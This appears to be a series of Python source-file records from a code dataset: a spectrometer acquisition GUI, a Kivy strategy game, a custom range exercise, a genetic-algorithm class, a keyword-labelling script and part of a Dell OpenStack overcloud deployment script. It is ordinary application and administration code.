Unpack results\n thread_out = {}\n \n while not result_queue.empty():\n result = result_queue.get()\n thread_out[result[0]] = result[1]\n \n x0, y0, head0 = thread_out[str(self.spec0)]\n x1, y1, head1 = thread_out[str(self.spec1)]\n \n # Save the spectra\n np.savetxt(fname0, np.column_stack((x0,y0)), header = head0)\n np.savetxt(fname1, np.column_stack((x1,y1)), header = head1)\n \n # Sum up the darks\n self.dark0 = np.add(self.dark0, y0)\n self.dark1 = np.add(self.dark1, y1)\n \n # Divide by number of darks to get average\n self.dark0 = self.dark0 / int(self.ent_dark0.get())\n self.dark1 = self.dark1 / int(self.ent_dark1.get())\n \n # Display the dark spectra\n self.line0.set_data(x0, y0)\n self.ax0.set_xlim(x0.min() - 5, x0.max() + 5)\n self.ax0.set_ylim(y0.min(), y0.max())\n self.line1.set_data(x1, y1)\n self.ax1.set_xlim(x1.min() - 5, x1.max() + 5)\n self.ax1.set_ylim(y1.min(), y1.min())\n self.canvas.draw()\n \n # Update notes file\n self.write_text('Dark updated\\n' + \\\n 'Spectrum no: ' + str(self.loop) + '\\n' + \\\n 'Time: ' + str(datetime.datetime.now()) + '\\n' + \\\n 'No. darks: ' + str(self.ent_dark0.get()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name0 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime0.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds0.get()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name1 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime1.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds1.get()))\n\n#========================================================================================\n#=======================================Start and stop===================================\n#========================================================================================\n \n # Start acquiring spectra \n def start_stop(self):\n \n # Begin acquisition\n if self.start_button.config('text')[-1] == 'START':\n # Start the acquire loop\n self.running = True\n \n # Update the button\n self.start_button.config(text = 'STOP')\n self.start_button.config(bg = 'red')\n \n # Update notes file\n self.write_text('Loop started\\n' + \\\n 'Spectrum no: ' + str(self.loop) + '\\n' + \\\n 'Time: ' + str(datetime.datetime.now()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name0 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime0.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds0.get()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name1 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime1.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds1.get()))\n \n # Stop acquisition\n else:\n # Stop the acquire loop\n self.running = False\n \n # Update button\n self.start_button.config(text = 'START')\n self.start_button.config(bg = 'green')\n \n # Update notes file\n self.write_text('Loop stopped\\n' + \\\n 'Spectrum no: ' + str(self.loop) + '\\n' + \\\n 'Time: ' + str(datetime.datetime.now()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name0 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime0.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds0.get()) + '\\n' + \\\n 'Spectrometer: ' + self.spec_name1 + '\\n' + \\\n 'Integration time (ms): ' + str(self.ent_intime1.get())+'\\n' + \\\n 'Coadds: ' + str(self.ent_coadds1.get()))\n \n#========================================================================================\n#======================================Acquire spectra===================================\n#========================================================================================\n \n # Loop continuously, acquire spectra when running = True \n def acquire(self):\n \n # Define spectra filepaths\n spectra_fp0 = self.ent_fp.get() + self.spec_name0 + '/spectra/'\n spectra_fp1 = self.ent_fp.get() + self.spec_name1 + '/spectra/'\n \n # Create if it does not exist\n if not os.path.exists(spectra_fp0):\n os.makedirs(spectra_fp0)\n if not os.path.exists(spectra_fp1):\n os.makedirs(spectra_fp1)\n \n if self.running:\n \n n = str('{num:05d}'.format(num=self.loop)) \n \n # Create filenames\n fname0 = spectra_fp0 + 'spectrum_' + n + '.txt'\n fname1 = spectra_fp1 + 'spectrum_' + n + '.txt'\n \n # Read spectrometers\n \n # Create results queue\n result_queue = Queue()\n \n # Create threads\n t0 = Thread(target=read_spectro, args = (result_queue, \n self.spec0, \n int(self.ent_intime0.get()),\n int(self.ent_coadds0.get()),\n 2048,\n True,\n True))\n \n t1 = Thread(target=read_spectro, args = (result_queue, \n self.spec1, \n int(self.ent_intime1.get()),\n int(self.ent_coadds1.get()),\n 2048,\n True,\n True))\n \n # Begin threads\n t0.start()\n t1.start()\n \n # End threads\n t0.join()\n t1.join()\n \n # Unpack results\n thread_out = {}\n \n while not result_queue.empty():\n result = result_queue.get()\n thread_out[result[0]] = result[1]\n \n x0, y0, head0 = thread_out[str(self.spec0)]\n x1, y1, head1 = thread_out[str(self.spec1)]\n \n # Save the spectra\n np.savetxt(fname0, np.column_stack((x0,y0)), header = head0)\n np.savetxt(fname1, np.column_stack((x1,y1)), header = head1)\n \n # Plot the spectra\n \n # Bounds\n y0_low = min(y0) - (0.1*min(y0))\n y0_high = max(y0) + (0.1*max(y0))\n y1_low = min(y1) - (0.1*min(y1))\n y1_high = max(y1) + (0.1*max(y1))\n \n # Replot\n self.line0.set_data(x0, y0)\n self.ax0.set_xlim(x0.min() - 5, x0.max() + 5)\n self.ax0.set_ylim(y0_low, y0_high)\n self.line1.set_data(x1, y1)\n self.ax1.set_xlim(x1.min() - 5, x1.max() + 5)\n self.ax1.set_ylim(y1_low, y1_high)\n self.canvas.draw()\n \n # Add one to loop\n self.loop += 1\n \n # Loop every 1 ms in background to check if commenced\n self.after(1, self.acquire)\n \n# Tkinter stuff \napp = mygui()\napp.geometry(\"1280x720\")\napp.mainloop()","sub_path":"dual_spectro_run.py","file_name":"dual_spectro_run.py","file_ext":"py","file_size_in_byte":27736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"354288203","text":"from kivy.app import App\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty, DictProperty, StringProperty\nfrom kivy.uix.label import Label\nfrom kivy.uix.button import Button\nfrom kivy.event import EventDispatcher\n\nfrom kivy.clock import Clock\n\nFPS = 1\n\n# resources\nRESOURCES = {\n \"food\": {\n \"n\": 500,\n \"per_s\": 0\n },\n \"wood\": {\n \"n\": 0,\n \"per_s\": 0\n },\n \"stone\": {\n \"n\": 0,\n \"per_s\": 0\n },\n \"metal\": {\n \"n\": 0,\n \"per_s\": 0\n }\n}\n\n# Buildings\nBUILDINGS = {\n \"farm\": {\n \"name\": \"Farm\",\n \"resources_per_s\": {\"food\": 10},\n \"n\": 0,\n },\n \"forest_camp\": {\n \"name\": \"Forest Camp\",\n \"resources_per_s\": {\"food\": 2, \"wood\": 5},\n \"n\": 0,\n },\n \"quarry\": {\n \"name\": \"Quarry\",\n \"resources_per_s\": {\"stone\": 2},\n \"n\": 0,\n },\n \"mine\": {\n \"name\": \"Mine\",\n \"resources_per_s\": {\"metal\": 1},\n \"n\": 0,\n }\n}\n\n# units\nUNITS = {\n \"villager\": {\n \"name\": \"Villager\",\n \"shortname\": \"v\",\n \"n\": 0,\n \"cost\": {\n \"food\": 50,\n },\n \"attack\": 1,\n \"life\": 15,\n },\n \"spearman\": {\n \"name\": \"Spearman\",\n \"shortname\": \"sp\",\n \"n\": 0,\n \"cost\": {\n \"food\": 80,\n \"wood\": 10,\n \"metal\": 8,\n },\n \"attack\": 7,\n \"life\": 30,\n },\n \"axeman\": {\n \"name\": \"Axeman\",\n \"n\": 0,\n \"cost\": {\n \"food\": 100,\n \"metal\": 15,\n },\n \"attack\": 10,\n \"life\": 25,\n },\n \"swordman\": {\n \"name\": \"Swordman\",\n \"n\": 0,\n \"cost\": {\n \"food\": 100,\n \"wood\": 5,\n \"metal\": 25,\n },\n \"attack\": 12,\n \"life\": 50,\n },\n \"cavalry\": {\n \"name\": \"Cavalry\",\n \"n\": 0,\n \"cost\": {\n \"food\": 300,\n \"wood\": 15,\n \"metal\": 25,\n },\n \"attack\": 15,\n \"life\": 80\n }\n}\n\n\nclass Farm(EventDispatcher):\n id = \"farm\"\n name = StringProperty(BUILDINGS.get(id).get(\"name\", \"Farm\"))\n n = NumericProperty(BUILDINGS.get(id).get(\"n\", 0))\n resources_per_s_per_unit = DictProperty({})\n resources_per_s = DictProperty({})\n id = StringProperty(id)\n\n def __init__(self):\n super().__init__()\n self.resources_per_s_per_unit = BUILDINGS.get(self.id).get(\"resources_per_s\", 0)\n self.resources_per_s = {}\n for resource in RESOURCES:\n self.resources_per_s[resource] = self.resources_per_s_per_unit.get(resource, 0) * self.n\n\n\nclass ForestCamp(EventDispatcher):\n id = \"forest_camp\"\n name = StringProperty(BUILDINGS.get(id).get(\"name\", \"Forest Camp\"))\n n = NumericProperty(BUILDINGS.get(id).get(\"n\", 0))\n resources_per_s_per_unit = DictProperty({})\n resources_per_s = DictProperty({})\n id = StringProperty(id)\n\n def __init__(self):\n super().__init__()\n self.resources_per_s_per_unit = BUILDINGS.get(self.id).get(\"resources_per_s\", 0)\n self.resources_per_s = {}\n for resource in RESOURCES:\n self.resources_per_s[resource] = self.resources_per_s_per_unit.get(resource, 0) * self.n\n\n\nclass Quarry(EventDispatcher):\n id = \"quarry\"\n name = StringProperty(BUILDINGS.get(id).get(\"name\", \"Quarry\"))\n n = NumericProperty(BUILDINGS.get(id).get(\"n\", 0))\n resources_per_s_per_unit = DictProperty({})\n resources_per_s = DictProperty({})\n id = StringProperty(id)\n\n def __init__(self):\n super().__init__()\n self.resources_per_s_per_unit = BUILDINGS.get(self.id).get(\"resources_per_s\", 0)\n self.resources_per_s = {}\n for resource in RESOURCES:\n self.resources_per_s[resource] = self.resources_per_s_per_unit.get(resource, 0) * self.n\n\n\nclass Mine(EventDispatcher):\n id = \"mine\"\n name = StringProperty(BUILDINGS.get(id).get(\"name\", \"Mine\"))\n n = NumericProperty(BUILDINGS.get(id).get(\"n\", 0))\n resources_per_s_per_unit = DictProperty({})\n resources_per_s = DictProperty({})\n id = StringProperty(id)\n\n def __init__(self):\n super().__init__()\n self.resources_per_s_per_unit = BUILDINGS.get(self.id).get(\"resources_per_s\", 0)\n self.resources_per_s = {}\n for resource in RESOURCES:\n self.resources_per_s[resource] = self.resources_per_s_per_unit.get(resource, 0) * self.n\n\n\nclass Buildings(GridLayout):\n farm = ObjectProperty(Farm())\n forest_camp = ObjectProperty(ForestCamp())\n quarry = ObjectProperty(Quarry())\n mine = ObjectProperty(Mine())\n\n def calc_total_villager_working(self):\n self.total = 0\n for building_name in BUILDINGS:\n building = getattr(self, building_name)\n self.total += building.n\n return self.total\n\n\nclass Food(EventDispatcher):\n id = \"food\"\n n = NumericProperty(RESOURCES.get(id).get(\"n\", 0))\n per_s = NumericProperty(RESOURCES.get(id).get(\"per_s\", 0))\n\n\nclass Wood(EventDispatcher):\n id = \"wood\"\n n = NumericProperty(RESOURCES.get(id).get(\"n\", 0))\n per_s = NumericProperty(RESOURCES.get(id).get(\"per_s\", 0))\n\n\nclass Stone(EventDispatcher):\n id = \"stone\"\n n = NumericProperty(RESOURCES.get(id).get(\"n\", 0))\n per_s = NumericProperty(RESOURCES.get(id).get(\"per_s\", 0))\n\n\nclass Metal(EventDispatcher):\n id = \"metal\"\n n = NumericProperty(RESOURCES.get(id).get(\"n\", 0))\n per_s = NumericProperty(RESOURCES.get(id).get(\"per_s\", 0))\n\n\nclass Resources(GridLayout):\n food = ObjectProperty(Food())\n wood = ObjectProperty(Wood())\n stone = ObjectProperty(Stone())\n metal = ObjectProperty(Metal())\n\n def update(self, dt):\n # print(\"update resources\")\n self.food.n += dt * self.food.per_s\n self.wood.n += dt * self.wood.per_s\n self.stone.n += dt * self.stone.per_s\n self.metal.n += dt * self.metal.per_s\n # print(self.food)\n\n\nclass Villager(EventDispatcher):\n id = \"villager\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Spearman(EventDispatcher):\n id = \"spearman\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Axeman(EventDispatcher):\n id = \"axeman\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Swordman(EventDispatcher):\n id = \"swordman\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Cavalry(EventDispatcher):\n id = \"cavalry\"\n name = StringProperty(UNITS.get(id).get(\"name\"))\n n = NumericProperty(UNITS.get(id).get(\"n\"))\n cost = DictProperty(UNITS.get(id).get(\"cost\"))\n\n\nclass Units(GridLayout):\n villager = ObjectProperty(Villager())\n spearman = ObjectProperty(Spearman())\n axeman = ObjectProperty(Axeman())\n swordman = ObjectProperty(Swordman())\n cavalry = ObjectProperty(Cavalry())\n\n\nclass RecruitMenu(GridLayout):\n pass\n\n\nclass Game(GridLayout):\n resources = ObjectProperty(Resources())\n units = ObjectProperty(Units())\n buildings = ObjectProperty(Buildings())\n\n def update(self, dt):\n # print(\"update game\")\n self.resources.update(dt)\n \n def recruit(self, unit, n):\n n = int(n)\n if self.resources.food.n >= unit.cost.get(\"food\", 0) * n and\\\n self.resources.wood.n >= unit.cost.get(\"wood\", 0) * n and\\\n self.resources.stone.n >= unit.cost.get(\"stone\", 0) * n and\\\n self.resources.metal.n >= unit.cost.get(\"metal\", 0) * n:\n self.resources.food.n -= unit.cost.get(\"food\", 0) * n\n self.resources.wood.n -= unit.cost.get(\"wood\", 0) * n\n self.resources.stone.n -= unit.cost.get(\"stone\", 0) * n\n self.resources.metal.n -= unit.cost.get(\"metal\", 0) * n\n unit.n += n\n \n def calc_idle_villagers(self):\n return self.units.villager.n - self.buildings.calc_total_villager_working()\n \n def update_resources_per_s(self):\n self.resources.food.per_s = 0\n self.resources.wood.per_s = 0\n self.resources.stone.per_s = 0\n self.resources.metal.per_s = 0\n for resource_name in RESOURCES:\n resource = getattr(self.resources, resource_name)\n for building_name in BUILDINGS:\n building = getattr(self.buildings, building_name)\n resource.per_s += building.resources_per_s[resource_name]\n\n\n def change_people_working_in_a_building(self, building, n):\n n = int(n)\n idle = self.calc_idle_villagers()\n # difference in workers between now and future:\n diff = n - building.n\n\n if idle >= diff:\n building.n = n\n for resource_name in RESOURCES:\n building.resources_per_s[resource_name] = building.resources_per_s_per_unit.get(resource_name, 0) * n\n self.update_resources_per_s()\n\nclass RPGApp(App):\n game = ObjectProperty(Game())\n\n def build(self):\n game = Game()\n Clock.schedule_interval(game.update, 1.0/FPS)\n return game\n\nif __name__ == \"__main__\":\n RPGApp().run()","sub_path":"python/kivy/RPG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"153372114","text":"\"\"\"\nSome of the functions have a bit cumbersome behavior when we deal with\npositional and keyword arguments.\n\nWrite a function that accept any iterable of unique values and then\nit behaves as range function:\n\n\nimport string\n\n\nassert = custom_range(string.ascii_lowercase, 'g') == ['a', 'b', 'c', 'd', 'e', 'f']\nassert = custom_range(string.ascii_lowercase, 'g', 'p') == ['g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o']\nassert = custom_range(string.ascii_lowercase, 'p', 'g', -2) == ['p', 'n', 'l', 'j', 'h']\n\n\nThis function accept only values, that have different hash or id.\n\"\"\"\n\n\ndef custom_range(ranged, start, stop=None, step=1):\n if len(ranged) == 0:\n raise Exception(\"Input have no elements\")\n if len(set(ranged)) != len(ranged):\n raise Exception(\"Input consist non-unique values\")\n if stop is None:\n stop = start\n start = ranged[0]\n return [s for s in ranged[ranged.index(start) : ranged.index(stop) : step]]\n","sub_path":"homework_02/custom_range.py","file_name":"custom_range.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"588637351","text":"import random\nimport string\nfrom difflib import SequenceMatcher\n\n\n\nclass Individu:\n\n def __init__(self, finalWord, defaultValue=None):\n super().__init__()\n if defaultValue is not None:\n self.word = defaultValue\n else:\n self.word = self.__generateWord(len(finalWord))\n self.genFitness(finalWord)\n\n \n def __generateWord(self, length):\n # letters = string.ascii_lowercase + ' '\n letters = string.printable\n return ''.join(random.choice(letters) for i in range(length))\n\n def genFitness(self, finalWord):\n self.fitness = SequenceMatcher(None, self.word, finalWord).ratio()\n # arrDiff = [i for i in range(len(self.word)) if self.word[i] != finalWord[i]]\n # self.fitness = 1 - (len(arrDiff) / len(finalWord))\n return self.fitness\n\n def randomMutate(self, percentage):\n isMutate = random.random()\n if isMutate < percentage:\n pos = random.randint(0, len(self.word))\n letters = string.ascii_lowercase + ' '\n old = self.word\n self.word = self.word[:pos] + random.choice(letters) + self.word[pos + 1 :]\n return\n","sub_path":"build/lib/TP-genetique/Individu.py","file_name":"Individu.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"97319262","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\n\n\ndef normalize_words():\n arq = open('disasters_words.txt').readlines()\n text = \" \".join(arq).replace(',', ' ').lower().split(' ')\n return sorted(set([x for x in text if len(x) > 1]))\n\n\ndef normalize_text(words):\n\n data = pd.read_csv('DATASET.csv')\n data['class'] = 0\n\n for index in data.index:\n text = data['text'][index]\n result = pd.Index(str(text).split()).intersection(pd.Index(words))\n\n if len(result) != 0:\n data.loc[index, 'class'] = 1\n return data\n\n\nif __name__ == \"__main__\":\n\n data = normalize_text(normalize_words())\n data.to_csv(\"DATASET_interests.csv\", index = None)\n","sub_path":"Preprocess - NLP/related_content.py","file_name":"related_content.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"631764814","text":"#!/usr/bin/python3\n\n# Copyright (c) 2016-2021 Dell Inc. or its subsidiaries.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport os\nimport re\nimport sys\nimport subprocess\nimport logging\nimport novaclient.client as nova_client\nimport time\nfrom ironic_helper import IronicHelper\nfrom logging_helper import LoggingHelper\nfrom credential_helper import CredentialHelper\nfrom dell_nfv import ConfigOvercloud\n# Dell utilities\nfrom identify_nodes import main as identify_nodes\nfrom update_ssh_config import main as update_ssh_config\nlogging.basicConfig()\nlogger = logging.getLogger(os.path.splitext(os.path.basename(sys.argv[0]))[0])\n\nhome_dir = os.path.expanduser('~')\n\nBAREMETAL_FLAVOR = \"baremetal\"\n\n\n# Check to see if the sequence contains numbers that increase by 1\ndef is_coherent(seq):\n r = []\n for i in range(seq[0], seq[-1]+1):\n r.append(i)\n return seq == r\n\n\ndef validate_node_placement():\n logger.info(\"Validating node placement...\")\n\n # For each role/flavor, node indices must start at 0 and increase by 1\n ironic = IronicHelper.get_ironic_client()\n\n flavor_to_indices = {}\n for node in ironic.node.list(detail=True):\n # Skip nodes that are in maintenance mode\n if node.maintenance:\n continue\n\n # Get the value of the \"node\" capability\n node_capability = None\n capabilities = node.properties[\"capabilities\"]\n for capability in capabilities.split(\",\"):\n (key, val) = capability.split(\":\")\n if key == \"node\":\n node_capability = val\n\n # If the node capability was not set then error out\n if not node_capability:\n ip, _ = CredentialHelper.get_drac_ip_and_user(node)\n\n raise ValueError(\"Error: Node {} has not been assigned a node \"\n \"placement index. Run assign_role for this \"\n \"node and specify a role with the \"\n \"- format\".format(ip))\n\n hyphen = node_capability.rfind(\"-\")\n flavor = node_capability[0:hyphen]\n index = node_capability[hyphen + 1:]\n # Build up a dict that maps a flavor name to a sequence of placment\n # indices\n if flavor not in flavor_to_indices:\n flavor_to_indices[flavor] = []\n\n flavor_to_indices[flavor].append(int(index))\n\n # Validate that the sequence starts at zero and is coherent\n error_msg = ''\n for flavor in flavor_to_indices.keys():\n flavor_to_indices[flavor].sort()\n seq = flavor_to_indices[flavor]\n if seq[0] != 0:\n error_msg += \"Error: There must be a node with flavor \\\"{}\\\" \" \\\n \"that has node placement index 0. Current nodes placement \" \\\n \"indices are {}\\n\".format(flavor, str(seq))\n\n if not is_coherent(seq):\n error_msg += \"Error: Nodes that have been assigned the \\\"{}\\\" \" \\\n \"flavor do not have node placement indices that increase by \" \\\n \"1. Current node indices are {}\\n\".format(flavor, str(seq))\n\n # If any errors were detected then bail\n if error_msg:\n raise ValueError(error_msg)\n\n\ndef create_flavors():\n logger.info(\"Creating overcloud flavors...\")\n\n flavors = [\n {\"id\": \"1\", \"name\": \"m1.tiny\", \"memory\": 512, \"disk\": 1,\n \"cpus\": 1},\n {\"id\": \"2\", \"name\": \"m1.small\", \"memory\": 2048, \"disk\": 20,\n \"cpus\": 1},\n {\"id\": \"3\", \"name\": \"m1.medium\", \"memory\": 4096, \"disk\": 40,\n \"cpus\": 2},\n {\"id\": \"4\", \"name\": \"m1.large\", \"memory\": 8192, \"disk\": 80,\n \"cpus\": 4},\n {\"id\": \"5\", \"name\": \"m1.xlarge\", \"memory\": 16384, \"disk\": 160,\n \"cpus\": 8}]\n\n os_auth_url, os_tenant_name, os_username, os_password, \\\n os_user_domain_name, os_project_domain_name = \\\n CredentialHelper.get_overcloud_creds()\n\n kwargs = {'username': os_username,\n 'password': os_password,\n 'auth_url': os_auth_url,\n 'project_name': os_tenant_name,\n 'user_domain_name': os_user_domain_name,\n 'project_domain_name': os_project_domain_name}\n n_client = nova_client.Client(2, **kwargs)\n\n existing_flavor_ids = []\n for existing_flavor in n_client.flavors.list(detailed=False):\n existing_flavor_ids.append(existing_flavor.id)\n\n for flavor in flavors:\n if flavor[\"id\"] not in existing_flavor_ids:\n print(' Creating ' + flavor[\"name\"])\n n_client.flavors.create(flavor[\"name\"], flavor[\"memory\"],\n flavor[\"cpus\"], flavor[\"disk\"],\n flavorid=flavor[\"id\"])\n else:\n print(' Flavor ' + flavor[\"name\"] + \" already exists\")\n\n\ndef create_volume_types():\n logger.info(\"Creating cinder volume types...\")\n types = []\n if not args.disable_rbd:\n types.append([\"rbd_backend\", \"tripleo_ceph\"])\n\n if args.enable_dellsc:\n types.append([\"dellsc_backend\", \"tripleo_dellsc\"])\n\n if args.enable_unity:\n types.append([\"unity_backend\", \"tripleo_dellemc_unity\"])\n\n if args.enable_powermax:\n types.append([\"powermax_backend\", \"tripleo_dellemc_powermax\"])\n\n if args.num_powerflex > 0:\n types.append([\"powerflex_backend\", \"tripleo_dellemc_powerflex\"])\n\n overcloudrc_name = CredentialHelper.get_overcloudrc_name()\n\n for type in types:\n type_name = type[0]\n cmd = \"source {} && cinder type-list | grep ' {} ' | \" \\\n \"awk '{{print $4}}'\".format(overcloudrc_name, type_name)\n proc = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)\n return_output = proc.communicate()[0].strip()\n\n if type_name == return_output:\n logger.warning(\"Cinder type exists, skipping {}\".format(type[0]))\n continue\n else:\n logger.info(\"Creating cinder type {}\".format(type[0]))\n cmd = \"source {} && \" \\\n \"cinder type-create {} && \" \\\n \"cinder type-key {} set volume_backend_name={}\" \\\n \"\".format(overcloudrc_name, type[0], type[0], type[1])\n os.system(cmd)\n\n os.system(\"source {} && \"\n \"cinder extra-specs-list\".format(overcloudrc_name))\n\n\ndef create_share_types():\n logger.info(\"Creating manila share types...\")\n types = []\n\n if args.enable_unity_manila:\n types.append([\"unity_share\", \"tripleo_manila_unity\"])\n\n if args.enable_powermax_manila:\n types.append([\"powermax_share\", \"tripleo_manila_powermax\"])\n\n overcloudrc_name = CredentialHelper.get_overcloudrc_name()\n\n for type in types:\n type_name = type[0]\n cmd = \"source {} && manila type-list | grep ' {} ' | \" \\\n \"awk '{{print $4}}'\".format(overcloudrc_name, type_name)\n proc = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)\n return_output = proc.communicate()[0].strip()\n\n if type_name == return_output:\n logger.warning(\"Manila type exists, skipping {}\".format(type[0]))\n continue\n else:\n logger.info(\"Creating manila share type {}\".format(type[0]))\n cmd = \"source {} && \" \\\n \"manila type-create --is_public True {} true && \" \\\n \"manila type-key {} set share_backend_name={}\" \\\n \"\".format(overcloudrc_name, type[0], type[0], type[1])\n os.system(cmd)\n\n os.system(\"source {} && \"\n \"manila extra-specs-list\".format(overcloudrc_name))\n\n\ndef run_deploy_command(cmd):\n status = os.system(cmd)\n\n if status == 0:\n stack_status = CredentialHelper.get_overcloud_stack_status()\n if not stack_status or 'FAILED' in stack_status:\n logger.info(\"\\nDeployment failed even \"\n \"though command returned success.\")\n status = 1\n\n return status\n\n\ndef finalize_overcloud():\n # from keystone.v3 import client\n\n # os_auth_url, os_tenant_name, os_username, os_password = \\\n # CredentialHelper.get_overcloud_creds()\n\n # try:\n # keystone_client = client.get_keystone_client(os_username,\n # os_password,\n # os_tenant_name,\n # os_auth_url)\n # except:\n # return None\n\n create_flavors()\n create_volume_types()\n create_share_types()\n\n # horizon_service = keystone_client.services.find(**{'name': 'horizon'})\n # horizon_endpoint = keystone_client.endpoints.find(\n # **{'service_id': horizon_service.id})\n # return horizon_endpoint.publicurl\n return None\n\n\ndef main():\n try:\n global args\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--controllers\",\n dest=\"num_controllers\",\n type=int,\n default=3,\n help=\"The number of controller nodes\")\n parser.add_argument(\"--dell-computes\",\n dest=\"num_dell_computes\",\n type=int,\n required=True,\n help=\"The number of dell compute nodes\")\n parser.add_argument(\"--dell-computeshci\",\n dest=\"num_dell_computeshci\",\n type=int,\n required=True,\n help=\"The number of dell hci compute nodes\")\n parser.add_argument(\"--storage\",\n dest=\"num_storage\",\n type=int,\n required=True,\n help=\"The number of storage nodes\")\n parser.add_argument(\"--powerflex\",\n dest=\"num_powerflex\",\n type=int,\n required=True,\n help=\"The number of powerflex storage nodes\")\n parser.add_argument(\"--enable_hugepages\",\n action='store_true',\n default=False,\n help=\"Enable/Disable hugepages feature\")\n parser.add_argument(\"--enable_numa\",\n action='store_true',\n default=False,\n help=\"Enable/Disable numa feature\")\n parser.add_argument(\"--vlans\",\n dest=\"vlan_range\",\n required=True,\n help=\"The VLAN range to use for Neutron in \"\n \" xxx:yyy format\")\n parser.add_argument(\"--nic_env_file\",\n default=\"5_port/nic_environment.yaml\",\n help=\"The NIC environment file to use\")\n parser.add_argument(\"--ntp\",\n dest=\"ntp_server_fqdn\",\n default=\"0.centos.pool.ntp.org\",\n help=\"The FQDN of the ntp server to use\")\n parser.add_argument(\"--timezone\",\n dest=\"time_zone\",\n default=\"America/Chicago\",\n help=\"The timezone to use\")\n parser.add_argument(\"--timeout\",\n default=\"300\",\n help=\"The amount of time in minutes to allow the \"\n \"overcloud to deploy\")\n parser.add_argument(\"--overcloud_name\",\n default=None,\n help=\"The name of the overcloud\")\n parser.add_argument(\"--hugepages_size\",\n dest=\"hugepages_size\",\n required=False,\n default=\"1GB\",\n help=\"HugePages size\")\n parser.add_argument(\"--hostos_cpu_count\",\n dest=\"hostos_cpu_count\",\n required=False,\n default=\"4\",\n help=\"HostOs Cpus to be configured\")\n parser.add_argument('--enable_dellsc',\n action='store_true',\n default=False,\n help=\"Enable cinder Dell Storage Center backend\")\n parser.add_argument('--enable_unity',\n action='store_true',\n default=False,\n help=\"Enable Dell EMC Unity backend\")\n parser.add_argument('--enable_unity_manila',\n action='store_true',\n default=False,\n help=\"Enable Dell EMC Unity Manila backend\")\n parser.add_argument('--enable_powermax',\n action='store_true',\n default=False,\n help=\"Enable Dell EMC Powermax backend\")\n parser.add_argument('--powermax_protocol',\n dest='powermax_protocol',\n required=False,\n default=\"iSCSI\",\n help=\"Dell EMC Powermax Protocol - iSCSI or FC\")\n parser.add_argument('--enable_powermax_manila',\n action='store_true',\n default=False,\n help=\"Enable Dell EMC PowerMax Manila backend\")\n parser.add_argument('--disable_rbd',\n action='store_true',\n default=False,\n help=\"Disable cinder Ceph and rbd backend\")\n parser.add_argument('--octavia_enable',\n action='store_true',\n default=False,\n help=\"Enables Octavia Load Balancer\")\n parser.add_argument('--octavia_user_certs_keys',\n action='store_true',\n default=False,\n help=\"Enables Octavia Load Balancer with \"\n \"user provided certs and keys\")\n parser.add_argument('--dvr_enable',\n action='store_true',\n default=False,\n help=\"Enables Distributed Virtual Routing\")\n parser.add_argument('--barbican_enable',\n action='store_true',\n default=False,\n help=\"Enables Barbican key manager\")\n parser.add_argument('--static_ips',\n action='store_true',\n default=False,\n help=\"Specify the IPs on the overcloud nodes\")\n parser.add_argument('--static_vips',\n action='store_true',\n default=False,\n help=\"Specify the VIPs for the networks\")\n parser.add_argument('--ovs_dpdk',\n action='store_true',\n default=False,\n help=\"Enable OVS+DPDK\")\n parser.add_argument('--sriov',\n action='store_true',\n default=False,\n help=\"Enable SR-IOV\")\n parser.add_argument('--hw_offload',\n action='store_true',\n default=False,\n help=\"Enable SR-IOV Offload\")\n parser.add_argument('--sriov_interfaces',\n dest=\"sriov_interfaces\",\n default=False,\n help=\"SR-IOV interfaces count\")\n 